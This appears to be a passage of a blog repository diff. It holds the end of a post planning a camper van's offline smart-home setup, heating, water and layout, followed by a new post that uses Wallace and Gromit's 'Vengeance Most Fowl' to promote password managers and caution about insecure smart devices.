So, I mentioned Home Assistant. I am a big fan of **some** smart home tech. For
me to be a fan of it, it needs to run (or be made to run) locally. Being able to
turn your lights on from your phone is great, but if the switch on the wall
doesn't work without an internet connection, I'm not interested. In my house,
all of our light switches have been flashed with [ESPHome](https://esphome.io/).
This custom firmware allows the switch to be controlled via Home Assistant, but
importantly, even if my network has some catastrophic failure, the button still
works. In the van, the chances of no internet are likely to be high - even with
a fancy antenna on the roof. So, requiring the internet is an absolute no go for
me.
That will probably mean a whole bunch of DIY devices. I should be able to quite
easily make things like lighting smart. I would also like to think that things
like water sensors for my fresh and waste water can be read by an ESP device.
What will probably take a bit more work / experimentation will be plugging an
ESP device into the vehicles CAN bus to see if I can read data from that. It
would also be great to have things like celling fans and heaters controllable
from Home Assistant.
Talking of fans and heaters, it is probably worth me mentioning that I will be
trying to keep costs down where possible - or at least prioritising where money
is spent. I would much rather, for instance, buy a cheap [Chinese celing
fan](https://www.aliexpress.com/item/1005007224984817.html) or [diesel
heater](https://www.aliexpress.com/item/1005006359176237.html) so I can buy
decent electronics from the likes of [Victron](https://www.victronenergy.com/).
Of course, I'll be taking things like the fans apart to see if I can stick an
ESP chip in them and control them with Home Assistant.
With regard to cooking in the van, I'm currently undecided on the best course of
action. I would like to go fully electric, with induction hobs and an electric
oven. Obviously, this would mean I need even more batteries in the van, which
will increase the weight even more. However, I think with the amount of driving
we normally do, I should be able to keep batteries topped up from the vehicle's
alternator. It is possible that we will keep a gas camping stove somewhere so
that if we're caught out, we can still boil water and heat food. But I would
rather avoid the added hassle of gas canisters and piping if I can.
With regard to water, I would like to mount both fresh and waste water tanks
under the van. I don't yet know how big they will be, and will probably be
determined by weight restrictions. However, my plan is to fit a low powered
immersion heater into these to prevent them freezing in the winter. I won't be
using this to make hot water, just to keep the temperature of the water above
freezing - again probably powered by an ESP chip.
Hot water is a different story. I have seen many youtube van builders pipe their
diesel heater's pipe to a heat exchanger to heat the water. I may do this, but I
would also like to try and heat the water from the engine's coolant system. I
haven't seen this done in a camper (I'm not suggesting it hasn't been done), but
I have seen it done [on other
vehicles](https://www.youtube.com/watch?v=LKmkqenpE5o).
One thing I'm fairly sure I don't want in the van is a full sized shower. At
least, not an internal one. Space is a premium in a van, and in my opinion, the
space a shower takes up is unnecessary. I will probably add something like the
[Bullfinch External Shower
Point](https://camperwarehouse.co.uk/product/bullfinch-external-shower-point-white/),
so we can have outdoor showers if we need them. But most of the time, I think
we'll be able to make do with a flannel and a bowl of hot water. It does mean
that the sink in the van will need to be big enough to wash our hair in. An
added bonus of the external shower system is we'll be able to wash off Rumple
before he gets in the van when he inevitably gets covered in mud.
Only thing I haven't really touched upon is the planned layout. That will
probably be my next blog post, but I plan to keep it quite simple. Bed at the
back. Undecided yet on the orientation, and that will depend if I can sleep
width ways once we've added the insulation. If I can't, and we end up making the
bed go length ways, we will probably have an "almost" fixed bed, where the
bottom foot or so is removable and is used as a back rest or something. This
frees up some more space in the middle of the van during the day, but still
means we don't need to make our bed each evening.
The cab area will have swivel seats. This will make our main living / working
area, and as a result, we won't have a separate "lounge". Again, space is at a
premium in a van.
Between the cab / living area and the bed will be our kitchen and toilet areas,
as well as a spot for Rumple's bed. Importantly this will include a mounting
point for his harness so he is secured whilst driving.
Before I finish up, it's probably important that I clarify a few things. I will
be learning as I go. I will be making mistakes and I will aim to share those
with you. However, this "build log" will not be tutorials. I am not an
electrician, so don't take electrical advice off me. Same for plumbing or
carpentry or anything else for that matter. That being said, if you spot
something I could be doing better, or an idea you think I might like, or just
want to say hi, leave a comment by emailing `comments.new-van<at>jn.hn`.

56
content/blog/023-wallace-and-gromit-passwords.md Normal file
View file

@ -0,0 +1,56 @@
---
title: Passwords Most Fowl
date: 2024-12-26
tags:
- Security
description: >
If you're like me, some of yesterday (Christmas 2024) was spent watching the
new Wallace and Gromit. I wonder if like me it also got you thinking about
password managers.
---
**Warning:** Contains Spoilers!
If you caught the latest episode, "Vengeance Most Fowl," you know, they were
once again up against the sneaky Feathers McGraw, who pulls off a pretty clever
hack involving a "smart gnome." The twist? The gnomes password was super easy
to guess! While it's all in good fun, its a great reminder of why we should all
be using password managers.
In the episode, Feathers McGraws ability to crack the gnome's password
highlights a real issue we face today: weak passwords. Let's be honest, are you
still using simple passwords like birthdays or pets' names? Or maybe your pets
name with a 1 and an exclamation mark? Its way too easy for hackers to figure
those out, and that puts our personal info at risk.
Now, imagine if Wallace had a password manager. If he'd used it properly,
he would've had strong, unique passwords for all his inventions and accounts.
He could have even shared the passwords with his trusty companion.
That would've made it nearly impossible for Feathers McGraw - or anyone else for
that matter - to break into the gnomes. Or at least, not by guessing the
passwords.
I'd also like to draw attention to everything getting "smart" in our
increasingly connected world, it seems like everything is getting a smart
upgrade - from our fridges to our light bulbs, and even garden gnomes!
While the convenience of smart devices can be appealing, there are some serious
risks that come with connecting everything to the internet. In "Vengeance Most
Fowl," the hacked smart gnome serves as a perfect example of how these devices
can become vulnerabilities. When we connect everyday items to the internet, we
open the door for hackers to exploit them, potentially gaining access to our
personal information or even taking control of our homes.
Whilst the gnomes in Wallace and Gromit were obviously over the top and comical,
it's become the norm for everything from cameras to lawn mowers to be connected.
Imagine a world where your smart gnome could be used to spy on you or trigger a
series of unfortunate events, just like in the episode. The more devices we
connect, the more points of entry there are for cybercriminals. Many of these
smart devices come with default passwords or lack robust security features,
making them easy targets. It's crucial to remember that while technology can
make our lives easier, it also requires us to be vigilant about our security
practices. By being mindful of what we connect to the internet and ensuring that
we use strong passwords and security measures, we can enjoy the benefits of
smart technology without falling victim to the dangers it can bring.